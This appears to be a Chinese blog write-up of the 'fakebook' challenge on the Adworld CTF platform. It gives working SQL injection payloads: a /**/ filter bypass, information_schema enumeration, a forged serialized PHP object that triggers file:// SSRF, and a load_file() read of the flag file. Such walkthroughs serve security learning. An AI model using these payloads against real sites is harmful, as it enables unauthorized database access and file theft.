当前位置: 首页 > news >正文

攻防世界-fakebook

news 来源:原创 2025/5/14 1:22:37

打开题目链接

尝试弱口令登录

失败

 随便注册

点击admin后跳转到下面这个页面

显示的是注册用户信息,观察url发现no=1,猜测存在注入

用单引号测试一下,报错,确实存在SQL注入

使用order by 判断字段数

?no=1 order by 5

5的时候报错,说明有4列

尝试联合查询注入,发现存在过滤

?no=0 union select 1,2,3,4 --+

尝试使用大小写绕过,发现不行

这里要使用内联注释/**/绕过

?no=0 union/**/select 1,2,3,4 --+

可以看到回显位在2

查数据库名:

?no=0 union/**/select 1,database(),3,4 --+

数据库名为fakebook

查该数据库下所有的表名:

?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

可以看到存在一个叫uses的表

查该表下的列名信息:

?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+

我们一般还会对条件进行限制,指定查哪个数据库下的

?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users' and table_schema='fakebook'--+

可以看到结果就少了几个

查具体字段信息:

?no=0 union/**/select 1,data,3,4 from fakebook.users --+

是一串序列化后的信息 :

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:8:"zxc.blog";}

name、age、blog为data反序列化值,blog读取成功会返回url值

我们可以通过反序列化来实现ssrf读取任意文件

通过目录扫描

知道flag就在html目录下

即:/var/www/html/flag.php 

?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

查看源码发现base64编码

解码得到flag

flag{c1e552fdf77049fabf65168f22f7aeab}

这里有一个更简单的方法,由于知道了flag的路径,直接使用load_file()函数进行文件读取:

?no=0 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 --+

查看源码,找到flag

相关文章:

  • Python 无废话-办公自动化Excel修改数据
  • 【高性能计算】CUDA编程之OpenCV的应用(教程与代码-4)//test error
  • kubectl系列(六)-kubectl describe
  • ArcMap:第二届全国大学生GIS技能大赛(广西师范学院)详解-上午题
  • 阶段六-Day01-Linux入门
  • 【12】c++设计模式——>单例模式练习(任务队列)
  • Charles:移动端抓包 / windows客户端 iOS手机 / 手机访问PC本地项目做调试
  • R²决定系数
  • Day4:Linux系统编程1-60P
  • c语言进阶部分详解(详细解析字符串常用函数,并进行模拟实现(下))
  • 多线程锁-synchronized字节码分析
  • 自动驾驶:未来的道路上的挑战与机遇
  • Python3入门教程||Python3 SMTP发送邮件
  • MySQL命令行中文乱码问题
  • 机器学习之旅-从Python 开始
  • 【LeetCode高频SQL50题-基础版】打卡第3天:第16~20题
  • 数据结构之堆,栈的实现
  • sheng的学习笔记-【中文】【吴恩达课后测验】Course 2 - 改善深层神经网络 - 第一周测验
  • 微信小程序点单左右联动的效果实现
  • 云原生边缘计算KubeEdge安装配置
  • 持续8年仍难终了的纠纷:败诉方因拒执罪被立案,胜诉方银行账户遭冻结
  • 广东:十年后省级水网主骨架全面建成,与国家骨干网互联互通
  • 牛市早报|中美日内瓦经贸会谈联合声明公布
  • 摩根士丹利:对冲基金已加码,八成投资者有意近期增配中国
  • 最美西游、三星堆遗址等入选“2025十大年度IP”
  • 云南一男子持刀致邻居3死1重伤案二审开庭,未当庭宣判